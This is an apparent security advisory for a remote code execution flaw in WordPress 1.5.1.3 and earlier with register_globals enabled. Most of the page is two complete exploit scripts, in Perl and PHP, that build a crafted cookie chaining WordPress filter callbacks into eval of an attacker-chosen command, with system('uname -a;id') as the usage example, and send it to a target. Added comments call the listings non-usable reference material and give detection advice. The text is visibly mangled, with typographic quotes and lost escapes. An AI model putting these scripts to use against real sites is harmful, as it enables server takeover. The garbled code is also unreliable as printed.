WordPress Command Execution Vulnerability (Cache_lastpostdate)

Summary

A vulnerability in WordPress's handling of incoming cookie data allows remote attackers to execute arbitrary code on the server when the PHP setting register_globals is set to On.

Credit:

The information has been provided by Kartoffelguru.


Details

Vulnerable Systems:
 * WordPress version 1.5.1.3 and prior (with register_globals)

Immune Systems:
 * WordPress version 1.5.1.4 or newer

Perl Exploit:
#!/usr/bin/perl
# Proof-of-concept request builder from the advisory above (WordPress <= 1.5.1.3
# with register_globals=On). Kept as reference material only: the listing has been
# mangled by extraction (typographic quotes, lost escape characters) and is not a
# usable script as printed.
use strict;
use MIME::Base64 qw(encode_base64 decode_base64);
use IO::Socket;

print ‘WordPress <= 1.5.1.3 – remote code execution 0-DDAAYY exploit (Converted by Noam)n’;
print ‘(C) Copyright 2005 Kartoffelgurunn’;
print ‘[!] info: requires register_globals turned on on target hostnn’;

if (@ARGV < 2)
{
 die (‘usage:nt./wpx.php http://www.xyz.net/blog/ ‘system(‘uname -a;id’);’nn’);
}

my $url = shift;
my $cmd = shift;

if (length($cmd)==0)
{
 $cmd = ‘phpinfo();’;
}

#print ‘code: ‘.encode_base64($cmd, ”).’n’;
my @code = unpack(‘C*’, encode_base64($cmd, ”));
#print ‘code: @coden’;
my $cnv = ”;
for (my $i=0;$i<@code; $i++)
{
 $cnv.= ‘chr(‘.$code[$i].’).’;
}
$cnv.=’chr(32)’;
#print ‘cnv: $cnvn’;

my $str = encode_base64(‘args[0]=eval(base64_decode(‘.$cnv.’)).die()&args[1]=x’, ”);
#print ‘str: [$str]n’;

# Defender note: with register_globals=On every cookie key becomes a PHP global,
# which is how request-controlled values reach WordPress internals here. A Cookie
# header carrying wp_filter[...] or cache_lastpost* keys is a usable detection
# signal; the fix is register_globals=Off and WordPress 1.5.1.4 or newer.
my $cookie=’wp_filter[query_vars][0][0][function]=get_lastpostdate;’. ‘wp_filter[query_vars][0][0][accepted_args]=0;’;
$cookie.=’wp_filter[query_vars][0][1][function]=base64_decode;’. ‘wp_filter[query_vars][0][1][accepted_args]=1;’;
$cookie.=’cache_lastpostmodified[server]=//e;cache_lastpostdate[server]=’;
$cookie.=$str;
$cookie.=’;wp_filter[query_vars][1][0][function]=parse_str;’. ‘wp_filter[query_vars][1][0][accepted_args]=1;’;
$cookie.=’wp_filter[query_vars][2][0][function]=get_lastpostmodified;’ . ‘wp_filter[query_vars][2][0][accepted_args]=0;’;
$cookie.=’wp_filter[query_vars][3][0][function]=preg_replace;’ . ‘wp_filter[query_vars][3][0][accepted_args]=3;’;

$url =~ /http://([^/]+)/(.*?)/;

my $hostname = $1;

my $path = $2;
my $Request = ‘GET /$path HTTP/1.1r
Host: $hostnamer
Cookie: $cookier
Referer: $hostnamer
Connection: closer
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)r
r
‘;

# Plain-text HTTP on port 80; the response is echoed verbatim below.
my $socket = IO::Socket::INET->new ( Proto => ‘tcp’, PeerAddr => $hostname, PeerPort => 80);
unless ($socket) { die ‘cannot connect to http daemon on $hostname’ }

print ‘Request: [$Request]n’;
print $socket $Request;

while (<$socket>)
{
 print $_;
}

PHP Exploit:
<?php
    // PHP variant of the proof-of-concept from the advisory above (WordPress
    // <= 1.5.1.3 with register_globals=On). Reference material only: the
    // listing has been mangled by extraction (typographic quotes, lost escape
    // characters) and is not a usable script as printed.
    echo ‘WordPress <= 1.5.1.3 – remote code execution 0-DDAAYY exploitn’;
    echo ‘(C) Copyright 2005 Kartoffelgurunn’;
    echo ‘[!] info: requires register_globals turned on on target hostnn’;
    // The request is sent through the curl extension, so bail out early without it.
    if (!extension_loaded(‘curl’)) {
        die (‘[-] you need the curl extension activated…n’);
    }

    // Prints the command-line usage text and terminates the script.
    function usage()
    {
        die (‘usage:nt./wpx.php -h http://www.xyz.net/blog/ -c ‘system(‘uname -a;id’);’nn’);
    }

    // -h is the target URL (required, must start with http://); -c is optional.
    $options = getopt(‘h:c:’);
    if (count($options) < 1 || !isset($options[‘h’])) {
        usage();
    }

    $host = (is_array($options[‘h’]) ? $options[‘h’][0]:$options[‘h’]);
    $cmd = (is_array($options[‘c’]) ? $options[‘c’][0]:$options[‘c’]);

    if (!preg_match(‘/^http:///’, $host, $dummy)) {
        usage();
    }

    if (strlen(trim($cmd))==0) {
        $cmd = ‘phpinfo();’;
    }

    $code = base64_encode($cmd);
    echo ‘code: $coden’;
    $cnv = ”;
    for ($i=0;$i<strlen($code); $i++) {
        $cnv.= ‘chr(‘.ord($code[$i]).’).’;
    }
    $cnv.=’chr(32)’;
    echo ‘cnv: $cnvn’;

    $str = base64_encode(‘args[0]=eval(base64_decode(‘.$cnv.’)).die()&args[1]=x’);

    // Defender note: with register_globals=On every cookie key becomes a PHP
    // global, which is how request-controlled values reach WordPress internals
    // here. A Cookie header carrying wp_filter[...] or cache_lastpost* keys is a
    // usable detection signal; the fix is register_globals=Off and WordPress
    // 1.5.1.4 or newer.
    $cookie=’wp_filter[query_vars][0][0][function]=get_lastpostdate;’ . ‘wp_filter[query_vars][0][0][accepted_args]=0;’;
    $cookie.=’wp_filter[query_vars][0][1][function]=base64_decode;’ . ‘wp_filter[query_vars][0][1][accepted_args]=1;’;
    $cookie.=’cache_lastpostmodified[server]=//e;cache_lastpostdate[server]=’;
    $cookie.=$str;
    $cookie.=’;wp_filter[query_vars][1][0][function]=parse_str;’ . ‘wp_filter[query_vars][1][0][accepted_args]=1;’;
    $cookie.=’wp_filter[query_vars][2][0][function]=get_lastpostmodified;’ . ‘wp_filter[query_vars][2][0][accepted_args]=0;’;
    $cookie.=’wp_filter[query_vars][3][0][function]=preg_replace;’ . ‘wp_filter[query_vars][3][0][accepted_args]=3;’;

    // Single GET over HTTP/1.0; the raw response body is echoed at the end.
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $host);
    curl_setopt($ch, CURLOPT_POST, 0);
    curl_setopt($ch, CURLOPT_COOKIE, $cookie);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_CURLOPT_REFERER, $host);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_USERAGENT, ‘Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)’);
    curl_setopt($ch, CURLOPT_HTTP_VERSION, CURL_HTTP_VERSION_1_0);
    echo ‘[+] now executingnn’;

    $r = curl_exec($ch);
    curl_close($ch);

    echo $r;

?>’

Categories: UNIX